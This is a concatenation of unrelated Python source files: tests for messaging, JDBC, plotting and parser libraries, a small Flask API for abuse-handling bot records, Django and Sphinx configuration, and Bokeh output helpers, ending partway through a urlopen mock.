        self.assertEqual(
            msg.payload['helper_metadata']['go']['user_account'],
            self.conversation.user_account.key)
        self.assertEqual(
            msg.payload['helper_metadata']['tag']['tag'],
            ['longcode', 'default10080'])

    @inlineCallbacks
    def test_process_command_send_message_in_reply_to(self):
        # When `in_reply_to` names a stored inbound message, the outbound
        # message should be sent as a reply to that message's sender.
        msg = yield self.app_helper.make_stored_inbound(
            self.conversation, "foo")
        yield self.app_helper.dispatch_command(
            'send_message',
            user_account_key=self.conversation.user_account.key,
            conversation_key=self.conversation.key,
            command_data={
                u'batch_id': u'batch-id',
                u'content': u'foo',
                u'to_addr': u'to_addr',
                u'msg_options': {
                    u'helper_metadata': {
                        u'tag': {
                            u'tag': [u'longcode', u'default10080']
                        }
                    },
                    u'transport_name': u'smpp_transport',
                    u'in_reply_to': msg['message_id'],
                    u'transport_type': u'sms',
                    u'from_addr': u'default10080',
                }
            })
        [sent_msg] = self.app_helper.get_dispatched_outbound()
        # The reply goes to the original sender, not command_data's to_addr.
        self.assertEqual(sent_msg['to_addr'], msg['from_addr'])
        self.assertEqual(sent_msg['content'], 'foo')
        self.assertEqual(sent_msg['in_reply_to'], msg['message_id'])

from flask import request, current_app, url_for
from flask_jsonschema import validate
from .. import db
from ..models import AHBot as Bot
from .decorators import json_response
from . import api


@api.route('/abusehelper', methods=['GET'])
@json_response
def get_abusehelper():
    """Return a list of available abusehelper

    **Example request**:

    .. sourcecode:: http

        GET /api/1.0/abusehelper HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 200 OK
        Content-Type: application/json

        {
          "abusehelper": [
            {
              "name": "ShadowServerBot",
              "url": "http://sample.com/path.html",
              "id": 1
            }
          ]
        }

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :>json array abusehelper: List of available bots
    :>jsonobj integer id: Bot ID
    :>jsonobj string name: Bot name

    :status 200: Deliverable endpoint found, response may be empty
    :status 404: Not found
    """
    # `.filter()` with no criteria was a no-op; query all bots directly.
    bots = Bot.query.all()
    return {'abusehelper': [a.serialize() for a in bots]}


@api.route('/abusehelper/<int:bot_id>', methods=['GET'])
@json_response
def get_bot(bot_id):
    """Get bot from database

    .. note:: Renamed from ``get_got``: ``add_bot`` builds its Location
       header with ``url_for('api.get_bot', ...)``, which raised a
       BuildError while the endpoint was misnamed.

    **Example request**:

    .. sourcecode:: http

        GET /api/1.0/abusehelper/1 HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 200 OK
        Content-Type: application/json

        {
          "name": "ShadowServerBot",
          "url": "http://sample.com/path.html",
          "id": 1
        }

    :param bot_id: Bot unique ID

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :>json integer id: Bot unique ID
    :>json string name: Bot name

    :status 200: Bot found
    :status 404: Resource not found
    """
    a = Bot.query.get_or_404(bot_id)
    return a.serialize()


@api.route('/abusehelper', methods=['POST', 'PUT'])
@validate('abusehelper', 'add_bot')
@json_response
def add_bot():
    """Add new bot entry

    **Example request**:

    .. sourcecode:: http

        POST /api/1.0/abusehelper HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json
        Content-Type: application/json

        {
          "name": "ShadowServerBot",
          "url": "http://sample.com/path.html"
        }

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 201 CREATED
        Content-Type: application/json

        {
          "bot": {
            "name": "ShadowServerBot",
            "url": "http://sample.com/path.html",
            "id": 1
          },
          "message": "Bot added"
        }

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :<json string name: Bot name
    :>jsonobj integer id: Unique ID of new bot
    :>jsonobj string name: Bot name
    :>json string message: Status message

    :status 201: Bot successfully saved
    :status 400: Bad request
    """
    a = Bot.fromdict(request.json)
    db.session.add(a)
    db.session.commit()
    return {'bot': a.serialize(), 'message': 'Bot added'}, 201, \
           {'Location': url_for('api.get_bot', bot_id=a.id)}


@api.route('/abusehelper/<int:bot_id>', methods=['PUT'])
@validate('abusehelper', 'update_bot')
@json_response
def update_bot(bot_id):
    """Update bot entry (not implemented yet).

    :param bot_id: Bot unique ID

    :status 501: Not implemented
    """
    # Returning the `NotImplemented` sentinel would hand the JSON
    # serializer an unencodable object; raising is the conventional stub.
    raise NotImplementedError('update_bot is not implemented')


@api.route('/abusehelper/<int:bot_id>', methods=['DELETE'])
@json_response
def delete_bot(bot_id):
    """Delete bot

    **Example request**:

    .. sourcecode:: http

        DELETE /api/1.0/abusehelper/1 HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 200 OK
        Content-Type: application/json

        {
          "message": "Bot deleted"
        }

    :param bot_id: Bot unique ID.

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :>json string message: Action status

    :status 200: Bot was deleted
    :status 404: Bot was not found
    """
    # BUG FIX: `filter_by(id == bot_id)` compared the builtin `id` to
    # bot_id and passed the boolean positionally; filter_by takes kwargs.
    count = Bot.query.filter_by(id=bot_id).delete()
    if not count:
        return {'message': 'No such bot'}, 404
    db.session.commit()
    return {'message': 'Bot deleted'}


@api.route('/abusehelper', methods=['DELETE'])
@json_response
def delete_abusehelper():
    """Clear abusehelper table

    **Example request**:

    .. sourcecode:: http

        DELETE /api/1.0/abusehelper HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 200 OK
        Content-Type: application/json

        {
          "message": "Bots deleted"
        }

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :>json string message: Action status

    :status 200: Bots were deleted
    """
    # BUG FIX: `.all()` returns a plain list, which has no `.delete()`;
    # bulk-delete on the query itself returns the number of rows removed.
    count = Bot.query.delete()
    db.session.commit()
    current_app.log.debug('Deleted {} abusehelper'.format(count))
    return {'message': 'Bots deleted'}

from django.contrib import admin

# Expose the Photos model in the Django admin with the default ModelAdmin.
from .models import Photos 
admin.site.register(Photos)
# Copyright (c) 2014, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license.  The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.

""" Tests for the BetterZoom Chaco tool """

import unittest

import numpy

from chaco.api import create_line_plot
from chaco.tools.api import BetterZoom
from enable.testing import EnableTestAssistant


class TestBetterZoomTool(EnableTestAssistant, unittest.TestCase):
    """ Tests for the BetterZoom Chaco tool """

    def setUp(self):
        # Build a simple line plot with a mock window so enable events
        # can be dispatched without a real GUI toolkit.
        values = numpy.arange(10)
        self.plot = create_line_plot((values, values))
        self.plot.bounds = [100, 100]
        self.plot._window = self.create_mock_window()
        self.tool = BetterZoom(component=self.plot)
        self.plot.active_tool = self.tool
        self.plot.do_layout()

    def tearDown(self):
        del self.tool
        del self.plot

    def test_default_position(self):
        tool = self.tool

        # this doesn't throw an exception
        self.send_key(tool, '+')

        # With no mouse position recorded, zoom centres on the component
        # (bounds are 100x100, so the centre is (50, 50)).
        self.assertEqual(tool.position, (50, 50))

        # expected behaviour for a normal zoom in operation
        self.assertNotEqual(tool._index_factor, 1.0)
        self.assertNotEqual(tool._value_factor, 1.0)
        self.assertEqual(len(tool._history), 2)

import pytest

from py4jdbc.dbapi2 import connect, Connection
from py4jdbc.resultset import ResultSet
from py4jdbc.exceptions.dbapi2 import Error


def test_connect(gateway):
    """Opening a connection and running a trivial query yields a ResultSet."""
    jdbc_url = "jdbc:derby:memory:testdb;create=true"
    cursor = connect(jdbc_url, gateway=gateway).cursor()
    result = cursor.execute("select * from SYS.SYSTABLES")
    assert isinstance(result, ResultSet)


def test_execute(derby):
    """execute() on an open cursor returns a ResultSet."""
    result = derby.cursor().execute("select * from SYS.SYSTABLES")
    assert isinstance(result, ResultSet)


def test_execute_with_params(derby):
    """Parameter binding works for single inserts and for executemany."""
    derby.autocommit = False
    cursor = derby.cursor()
    cursor.execute("create schema x_with_params")
    cursor.execute("create table x_with_params.cowtest(a int, b char(1))")

    select = "select * from x_with_params.cowtest as r"
    insert = "insert into x_with_params.cowtest (a, b) values (?, ?)"

    # Table starts out empty.
    assert len(cursor.execute(select).fetchall()) == 0

    # One row via single-statement parameter binding.
    cursor.execute(insert, (12, "m"))
    assert len(cursor.execute(select).fetchall()) == 1

    # Bulk insert via executemany.
    bulk_params = list(enumerate("thecowsaremooing"))
    cursor.executemany(insert, bulk_params)
    assert len(cursor.execute(select).fetchall()) == len("thecowsaremooing") + 1

    # Leave the fixture database untouched.
    derby.rollback()
    derby.autocommit = True


def test_fetchone(derby):
    """fetchone() produces a single instance of the result set's Row class."""
    result = derby.cursor().execute("select * from SYS.SYSTABLES")
    first_row = result.fetchone()
    assert isinstance(first_row, result.Row)


def test_fetchmany(derby):
    """Every row returned by fetchmany has the result set's Row class."""
    result = derby.cursor().execute("select * from SYS.SYSTABLES")
    assert all(isinstance(row, result.Row) for row in result.fetchmany(5))


def test_fetchManyCount(derby):
    """Successive fetchmany batches cover every inserted row exactly once."""
    derby.autocommit = False
    cursor = derby.cursor()
    cursor.execute("create schema x_with_params")
    cursor.execute("create table x_with_params.cowtest(a int, b char(1))")
    insert = "insert into x_with_params.cowtest (a, b) values (?, ?)"
    cursor.executemany(insert, list(enumerate("thecowsaremooing")))
    result = cursor.execute("select a from x_with_params.cowtest")
    total = 0
    while True:
        batch = result.fetchmany(3)
        total += len(batch)
        # A short batch means the result set is exhausted.
        if len(batch) < 3:
            break
    derby.rollback()
    derby.autocommit = True
    assert total == len("thecowsaremooing")


def test_fetchall(derby):
    """Every row returned by fetchall has the result set's Row class."""
    result = derby.cursor().execute("select * from SYS.SYSTABLES")
    assert all(isinstance(row, result.Row) for row in result.fetchall())


def test_Cursor__iter__(derby):
    """Iterating the result set directly also yields Row instances."""
    result = derby.cursor().execute("select * from SYS.SYSTABLES")
    assert all(isinstance(row, result.Row) for row in result)


def test_Cursor_fetchone_after_exhaustion(derby):
    """fetchone() returns None once the result set is fully consumed.

    NOTE: this function was originally also named ``test_Cursor__iter__``,
    silently shadowing the previous test so that it never ran; it has been
    renamed so both tests are collected.
    """
    cur = derby.cursor()
    rs = cur.execute("select * from SYS.SYSTABLES")
    # Exhaust all rows.
    list(rs)
    assert rs.fetchone() is None


def test_close_and_execute(derby):
    """execute() on a closed cursor raises the dbapi2 Error."""
    cursor = derby.cursor()
    cursor.close()
    with pytest.raises(Error):
        cursor.execute("select * from SYS.SYSTABLES")


def test_close_and_fetchone(derby):
    """fetchone() after closing the cursor raises the dbapi2 Error."""
    cursor = derby.cursor()
    cursor.execute("select * from SYS.SYSTABLES")
    cursor.close()
    with pytest.raises(Error):
        cursor.fetchone()


def test_close_twice(derby):
    """Closing an already-closed cursor raises the dbapi2 Error."""
    cursor = derby.cursor()
    cursor.close()
    with pytest.raises(Error):
        cursor.close()



"""Unit-tests for `tree.visitors`
"""

from py2c import tree
from py2c.tree import visitors

from py2c.tests import Test, data_driven_test
from nose.tools import assert_equal


# TEST:: Add non-node fields

# =============================================================================
# Helper classes
# =============================================================================
class BasicNode(tree.Node):
    # Minimal leaf node; the visitors' primary test subject.
    _fields = []


class BasicNodeReplacement(tree.Node):
    # Node that the test transformer substitutes for BasicNode.
    _fields = []


class BasicNodeWithListReplacement(tree.Node):
    # Node that the test transformer replaces with a list of nodes.
    _fields = []


class BasicNodeDeletable(tree.Node):
    # Node that the test transformer deletes (its visit returns None).
    _fields = []


class ParentNode(tree.Node):
    # Node with a single optional child, for testing recursion into fields.
    _fields = [
        ('child', tree.Node, 'OPTIONAL'),
    ]


class ParentNodeWithChildrenList(tree.Node):
    """Node with list of nodes as field
    """
    # Used to test visiting/transforming each element of a list field.
    _fields = [
        ('child', tree.Node, 'ZERO_OR_MORE'),
    ]


# -----------------------------------------------------------------------------
# Concrete Visitors used for testing
# -----------------------------------------------------------------------------
class VisitOrderCheckingVisitor(visitors.RecursiveNodeVisitor):
    """Records the class name of every node visited, in visit order."""

    def __init__(self):
        super().__init__()
        self.visited = []

    def generic_visit(self, node):
        self.visited.append(type(node).__name__)
        super().generic_visit(node)

    def visit_BasicNodeReplacement(self, node):
        # Specific visitor: records a marker instead of the class name.
        self.visited.append("visited Copy!")


class AccessPathCheckingVisitor(visitors.RecursiveNodeVisitor):
    """Snapshots the access path in effect when a BasicNode is visited."""

    def __init__(self):
        super().__init__()
        self.recorded_access_path = None

    def visit_BasicNode(self, node):
        # Copy, since the visitor mutates access_path as it recurses.
        self.recorded_access_path = list(self.access_path)


class EmptyTransformer(visitors.RecursiveNodeTransformer):
    # Transformer with no visit_* overrides: must leave trees unchanged.
    pass


class VisitOrderCheckingTransformer(visitors.RecursiveNodeTransformer):
    """Records the class name of every node visited, in visit order."""

    def __init__(self):
        super().__init__()
        self.visited = []

    def generic_visit(self, node):
        self.visited.append(type(node).__name__)
        return super().generic_visit(node)

    def visit_BasicNodeReplacement(self, node):
        # Specific visitor: records a marker and keeps the node unchanged.
        self.visited.append("visited Copy!")
        return node


class AccessPathCheckingTransformer(visitors.RecursiveNodeTransformer):
    """Snapshots the access path in effect when a BasicNode is visited."""

    def __init__(self):
        super().__init__()
        self.recorded_access_path = None

    def visit_BasicNode(self, node):
        # Copy, since the transformer mutates access_path as it recurses.
        self.recorded_access_path = list(self.access_path)
        return node


class TransformationCheckingTransformer(visitors.RecursiveNodeTransformer):
    # Exercises every transformation kind the transformer supports.

    def visit_BasicNode(self, node):
        # Replace one node with another node.
        return BasicNodeReplacement()

    def visit_BasicNodeDeletable(self, node):
        return None  # Delete this node

    def visit_BasicNodeReplacement(self, node):
        return self.NONE_DEPUTY  # Replace this node with None

    def visit_BasicNodeWithListReplacement(self, node):
        # Replace one node with a list of nodes.
        return [BasicNode(), BasicNodeReplacement()]


# -----------------------------------------------------------------------------
# Tests
# -----------------------------------------------------------------------------
class TestRecursiveASTVisitor(Test):
    """py2c.tree.visitors.RecursiveNodeVisitor
    """
    context = globals()

    @data_driven_test("visitors-visitor_order.yaml", prefix="visit order of ")
    def test_visit_order(self, node, order):
        # Nodes must be visited in the order specified by the fixture.
        to_visit = self.load(node)

        # The main stuff
        visitor = VisitOrderCheckingVisitor()
        retval = visitor.visit(to_visit)

        # Visitors (unlike transformers) return nothing.
        assert_equal(retval, None)
        assert_equal(visitor.visited, order)

    @data_driven_test("visitors-access_path.yaml", prefix="access path on visit of ")
    def test_access_path(self, node, access):
        # The access path recorded during the visit must match the fixture.
        to_visit = self.load(node)
        access_path = self.load(access)

        # The main stuff
        visitor = AccessPathCheckingVisitor()
        retval = visitor.visit(to_visit)

        assert_equal(retval, None)
        assert_equal(visitor.recorded_access_path, access_path)


class TestRecursiveASTTransformer(Test):
    """py2c.tree.visitors.RecursiveNodeTransformer
    """
    context = globals()

    @data_driven_test("visitors-visitor_order.yaml", prefix="empty transformer does not transform ")
    def test_empty_transformer(self, node, order):
        # A transformer with no visit_* overrides returns the tree as-is.
        to_visit = self.load(node)

        # The main stuff
        visitor = EmptyTransformer()
        retval = visitor.visit(to_visit)

        assert_equal(to_visit, retval)

    @data_driven_test("visitors-visitor_order.yaml", prefix="visit order of ")
    def test_visit_order(self, node, order):
        # Nodes must be visited in the order specified by the fixture.
        to_visit = self.load(node)

        # The main stuff
        visitor = VisitOrderCheckingTransformer()
        retval = visitor.visit(to_visit)

        # This transformer is an identity transform: same tree comes back.
        assert_equal(to_visit, retval)
        assert_equal(visitor.visited, order)

    @data_driven_test("visitors-access_path.yaml", prefix="access path on visit of ")
    def test_access_path(self, node, access):
        # The access path recorded during the visit must match the fixture.
        to_visit = self.load(node)
        access_path = self.load(access)

        # The main stuff
        visitor = AccessPathCheckingTransformer()
        retval = visitor.visit(to_visit)

        assert_equal(retval, to_visit)
        assert_equal(visitor.recorded_access_path, access_path)

    @data_driven_test("visitors-transform.yaml", prefix="transformation of ")
    def test_transformation(self, node, expected):
        # Replacement, deletion and list-splice cases per the fixture.
        to_visit = self.load(node)
        expected_node = self.load(expected)

        # The main stuff
        visitor = TransformationCheckingTransformer()
        retval = visitor.visit(to_visit)

        assert_equal(retval, expected_node)


if __name__ == '__main__':
    # Allow running this test module directly via the project test runner.
    from py2c.tests import runmodule
    runmodule()

from importlib import import_module
from inspect import getdoc

def attribs(name):
    """Import module *name* and report its ``__all__``/``__doc__`` status.

    :param name: dotted module name passed to ``importlib.import_module``.
    """
    mod = import_module(name)
    # The original used Python-2 `print` statements even though this file
    # also calls the print() function below, so it could not even be
    # parsed by Python 3; these calls produce identical output.
    print(name)
    print('Has __all__?', hasattr(mod, '__all__'))
    print('Has __doc__?', hasattr(mod, '__doc__'))
    print('doc: ', getdoc(mod))

if __name__=='__main__':
    # Probe a few modules for docstring metadata.
    attribs('cairo')
    attribs('zope')
    attribs('A.B.C')
    
    import hacked
    # Minimal stand-in for the options object hacked expects.
    class Object(object):
        pass
    
    opt = Object()
    opt.ignore_errors = False
    # NOTE(review): hard-coded developer paths — presumably a scratch
    # experiment; verify before reuse.
    a, d = hacked.get_all_attr_has_docstr('/home/ali/ws-pydev/apidocfilter/A/B', 
                                         '/home/ali/ws-pydev/apidocfilter/A/B/C',
                                         opt)
    print(a)
    print(d)


class Requirement(object):
    """
    The base class for requirements.

    Requirements are the basis for Dominion. They define
    what needs to exist on a host/role, or perhaps what *mustn't* exist.

    Requirements are defined on Roles.
    """
    # Class-wide counter used to preserve the declaration order of
    # requirement instances.  (The stray no-op string literal that used
    # to sit here has been folded into the class docstring above.)
    creation_counter = 0

    def __init__(self, required=True, ensure=None, depends=None, post=None):
        """
        :param required: whether the requirement must be satisfied.
        :param ensure: "exists" (default) or "removed".
        :param depends: requirements this one depends on.
        :param post: actions to run afterwards.
        """
        self.required = required
        self.ensure = ensure or "exists"
        self.depends = depends or ()
        # Something that must be removed is, by definition, not required.
        if self.ensure == "removed":
            self.required = False
        self.post = post or ()

        # Record this instance's position in declaration order.
        self.creation_counter = Requirement.creation_counter
        Requirement.creation_counter += 1

    def __call__(self):
        # Propagate apply()'s result (the original discarded it).
        return self.apply()

    def apply(self):
        """Install or uninstall according to ``ensure``.

        Subclasses provide ``install``/``uninstall``; the base class
        silently does nothing and returns None.
        """
        if self.ensure == "exists" or self.required:
            if hasattr(self, 'install'):
                return self.install()
        if self.ensure == "removed":
            if hasattr(self, 'uninstall'):
                return self.uninstall()

import py

try:
    from pypy.rpython.test.test_llinterp import interpret
except ImportError:
    py.test.skip('Needs PyPy to be on the PYTHONPATH')

from rply import ParserGenerator, Token
from rply.errors import ParserGeneratorWarning

from .base import BaseTests
from .utils import FakeLexer, BoxInt, ParserState


class TestTranslation(BaseTests):
    """Checks that rply-generated parsers survive RPython translation."""

    def run(self, func, args):
        # Run `func` under PyPy's RPython test interpreter instead of
        # plain CPython, proving the parser code is RPython-compatible.
        return interpret(func, args)

    def test_basic(self):
        pg = ParserGenerator(["NUMBER", "PLUS"])

        @pg.production("main : expr")
        def main(p):
            return p[0]

        @pg.production("expr : expr PLUS expr")
        def expr_op(p):
            return BoxInt(p[0].getint() + p[2].getint())

        @pg.production("expr : NUMBER")
        def expr_num(p):
            return BoxInt(int(p[0].getstr()))

        # Without a declared precedence for PLUS the grammar is ambiguous.
        with self.assert_warns(ParserGeneratorWarning, "1 shift/reduce conflict"):
            parser = pg.build()

        def f(n):
            # n + n, fed through the parser token by token.
            return parser.parse(FakeLexer([
                Token("NUMBER", str(n)),
                Token("PLUS", "+"),
                Token("NUMBER", str(n))
            ])).getint()

        assert self.run(f, [12]) == 24

    def test_state(self):
        pg = ParserGenerator(["NUMBER", "PLUS"], precedence=[
            ("left", ["PLUS"]),
        ])

        @pg.production("main : expression")
        def main(state, p):
            state.count += 1
            return p[0]

        @pg.production("expression : expression PLUS expression")
        def expression_plus(state, p):
            state.count += 1
            return BoxInt(p[0].getint() + p[2].getint())

        @pg.production("expression : NUMBER")
        def expression_number(state, p):
            state.count += 1
            return BoxInt(int(p[0].getstr()))

        parser = pg.build()

        def f():
            # 10 + 12 + (-2) = 20, plus 6 production invocations counted
            # in the parser state.
            state = ParserState()
            return parser.parse(FakeLexer([
                Token("NUMBER", "10"),
                Token("PLUS", "+"),
                Token("NUMBER", "12"),
                Token("PLUS", "+"),
                Token("NUMBER", "-2"),
            ]), state=state).getint() + state.count

        assert self.run(f, []) == 26

# -*- coding: utf-8 -*-
#
# zambiaureport documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# Sphinx extension modules (none needed for this project).
extensions = []

# Paths, relative to this directory, that contain templates.
templates_path = ['_templates']

# Source file suffix and the master toctree document.
source_suffix = '.rst'
master_doc = 'index'

# Project metadata.
project = u'zambiaureport'
copyright = u'2014, Andre Lesa'

# The short X.Y version and the full release string (including any
# alpha/beta/rc tags); identical here.
version = '0.1'
release = '0.1'

# Patterns, relative to the source directory, ignored when looking for
# source files.
exclude_patterns = ['_build']

# Pygments (syntax highlighting) style.
pygments_style = 'sphinx'

# All other general options (source_encoding, language, today/today_fmt,
# default_role, add_function_parentheses, add_module_names, show_authors,
# modindex_common_prefix, ...) keep their Sphinx defaults.


# -- Options for HTML output ----------------------------------------------

# Built-in theme used for HTML and HTML Help pages.
html_theme = 'default'

# Custom static files (such as style sheets); copied after Sphinx's own
# static files, so e.g. a "default.css" here overrides the built-in one.
html_static_path = ['_static']

# Output file base name for the HTML help builder.
htmlhelp_basename = 'zambiaureportdoc'

# All other HTML options (html_theme_options, html_theme_path, html_title,
# html_short_title, html_logo, html_favicon, html_last_updated_fmt,
# html_use_smartypants, html_sidebars, html_additional_pages,
# html_domain_indices, html_use_index, html_split_index,
# html_show_sourcelink, html_show_sphinx, html_show_copyright,
# html_use_opensearch, html_file_suffix, ...) keep their Sphinx defaults.


# -- Options for LaTeX output ---------------------------------------------

# Overrides for the LaTeX builder; empty means every option (papersize,
# pointsize, preamble, ...) keeps its default.
latex_elements = {}

# Grouping of the document tree into LaTeX files: one tuple per output,
# (source start file, target name, title, author, documentclass).
latex_documents = [
  ('index', 'zambiaureport.tex', u'zambiaureport Documentation',
   u'Andre Lesa', 'manual'),
]

# latex_logo, latex_use_parts, latex_show_pagerefs, latex_show_urls,
# latex_appendices and latex_domain_indices keep their defaults.


# -- Options for manual page output ---------------------------------------

# One entry per manual page:
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'zambiaureport', u'zambiaureport Documentation',
     [u'Andre Lesa'], 1)
]

# man_show_urls keeps its default (False).


# -- Options for Texinfo output -------------------------------------------

# Grouping of the document tree into Texinfo files: one tuple per output,
# (source start file, target name, title, author, dir menu entry,
#  description, category).
texinfo_documents = [
  ('index', 'zambiaureport', u'zambiaureport Documentation',
   u'Andre Lesa', 'zambiaureport',
   'Zambia U-Report reference implementation.', 'Miscellaneous'),
]

# texinfo_appendices, texinfo_domain_indices and texinfo_show_urls keep
# their defaults.
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''

'''

#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip

# Module-level logger, named after this module.
log = logging.getLogger(__name__)

#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------

# Bokeh imports
from .notebook import run_notebook_hook
from .state import curstate

#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------

# Public names exported by star-imports of this module.
__all__ = (
    'output_file',
    'output_notebook',
    'reset_output',
)

#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------

def output_file(filename, title="Bokeh Plot", mode=None, root_dir=None):
    ''' Configure the default output state to save generated output to an
    HTML file when :func:`show` is called.

    Does not change the current ``Document`` from ``curdoc()``. File and
    notebook output may be active at the same time, so e.g., this does not
    clear the effects of ``output_notebook()``.

    Args:
        filename (str) : a filename for saving the HTML document

        title (str, optional) : a title for the HTML document (default: "Bokeh Plot")

        mode (str, optional) : how to include BokehJS (default: ``'cdn'``)
            One of: ``'inline'``, ``'cdn'``, ``'relative(-dev)'`` or
            ``'absolute(-dev)'``. See :class:`bokeh.resources.Resources` for more details.

        root_dir (str, optional) : root directory to use for 'absolute' resources. (default: None)
            This value is ignored for other resource types, e.g. ``INLINE`` or
            ``CDN``.

    Returns:
        None

    .. note::
        Generally, this should be called at the beginning of an interactive
        session or the top of a script.

    .. warning::
        The output file is overwritten on every save, e.g., each time
        show() or save() is invoked.

    '''
    state = curstate()
    state.output_file(filename, title=title, mode=mode, root_dir=root_dir)

def output_notebook(resources=None, verbose=False, hide_banner=False, load_timeout=5000, notebook_type='jupyter'):
    ''' Configure the default output state to generate output in notebook
    cells when :func:`show` is called. :func:`show` may be called multiple
    times in a single cell to display multiple objects in the output cell;
    they are displayed in order.

    Args:
        resources (Resource, optional) :
            How and where to load BokehJS from (default: CDN)

        verbose (bool, optional) :
            whether to display detailed BokehJS banner (default: False)

        hide_banner (bool, optional):
            whether to hide the Bokeh banner (default: False)

        load_timeout (int, optional) :
            Timeout in milliseconds when plots assume load timed out (default: 5000)

        notebook_type (string, optional):
            Notebook type (default: jupyter)

    Returns:
        None

    .. note::
        Generally, this should be called at the beginning of an interactive
        session or the top of a script.

    '''
    # notebook_type is validated inside curstate().output_notebook, so run
    # that first, before the load hook does any real work.
    state = curstate()
    state.output_notebook(notebook_type)
    run_notebook_hook(notebook_type, 'load', resources, verbose, hide_banner, load_timeout)

def reset_output(state=None):
    ''' Clear the default state of all output modes.

    The ``state`` argument is accepted but not consulted by this body; the
    shared state from ``curstate()`` is always the one reset.

    Returns:
        None

    '''
    current = curstate()
    current.reset()

#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------

#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------

#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------

from django import template

from django.utils.safestring import mark_safe
from mezzanine.conf import settings

from mezzanine_developer_extension.utils import refactor_html


register = template.Library()

# Validate settings.TERMINAL_STYLE at import time.
# Possible values are:
#   - mezzanine_developer_extension.styles.macos
#   - mezzanine_developer_extension.styles.ubuntu
#   - mezzanine_developer_extension.styles.windows
# Raise ImproperlyConfigured (the Django idiom for bad settings; it is an
# Exception subclass, so existing handlers still catch it) instead of a
# bare Exception.
from django.core.exceptions import ImproperlyConfigured

_prefix = "mezzanine_developer_extension.styles"
_valid_styles = ["%s.macos" % _prefix, "%s.ubuntu" % _prefix,
                 "%s.windows" % _prefix]
try:
    if settings.TERMINAL_STYLE not in _valid_styles:
        # The user has specified an unsupported terminal styling format.
        msg = "Wrong terminal style format. Check the value of TERMINAL_STYLE"\
              " in your settings.py file."
        raise ImproperlyConfigured(msg)

except AttributeError:
    # settings.TERMINAL_STYLE is not defined at all.
    msg = "You have not specified a terminal output format. You have to"\
          " define the attribute TERMINAL_STYLE in your settings.py"
    raise ImproperlyConfigured(msg)


@register.filter(name='safe_developer')
def safe_developer(content, style="macos"):
    """
    Render ``content`` without cleaning the original, replacing the
    terminal divs with a more complex HTML layout for the given style.
    """
    return mark_safe(refactor_html(content, style))
from datetime import datetime

from pymongo.connection import Connection

from django.db import models

from eventtracker.conf import settings

def get_mongo_collection():
    "Open a connection to MongoDB and return the collection to use."
    host, port = settings.MONGODB_HOST, settings.MONGODB_PORT
    if settings.RIGHT_MONGODB_HOST:
        # A paired (replica) setup is configured; connect to both members.
        connection = Connection.paired(
            left=(host, port),
            right=(settings.RIGHT_MONGODB_HOST, settings.RIGHT_MONGODB_PORT),
        )
    else:
        connection = Connection(host=host, port=port)
    database = connection[settings.MONGODB_DB]
    return database[settings.MONGODB_COLLECTION]
    

def save_event(collection, event, timestamp, params):
    "Save the event in MongoDB collection"
    # Convert the unix timestamp into a datetime before persisting.
    document = {
        'event': event,
        'timestamp': datetime.fromtimestamp(timestamp),
        'params': params,
    }
    collection.insert(document)

class Event(models.Model):
    "Dummy model for development."
    # Set automatically when the row is inserted (auto_now_add).
    timestamp = models.DateTimeField(auto_now_add=True)
    # Event name, slug-formatted.
    event = models.SlugField()
    # Event parameters stored as serialized text.
    params = models.TextField()

# encoding: utf-8

import sys
# Make ../src importable. The previous form,
#   sys.path.append(sys.path.insert(0, "../src"))
# also appended None to sys.path, because list.insert() returns None.
sys.path.insert(0, "../src")

def urlopen(*args, **kwargs):
    # Minimal stand-in for urllib's urlopen: only the url (the first
    # positional argument) is honoured; everything else is ignored.
    url = args[0]
    return Urls[url]

# Provide a simple hashtable to contain the content of the urls and 
# provide a mock object similar to what will be returned from the
# real urlopen() function calls
from io import StringIO
from time import time
import re
from nose.tools import with_setup
class MockUrlContent(StringIO):
    """In-memory stand-in for the response object urlopen() returns."""

    def __init__(self, content):
        super(MockUrlContent, self).__init__(content)
        # Real responses expose headers; provide a fake last-modified stamp.
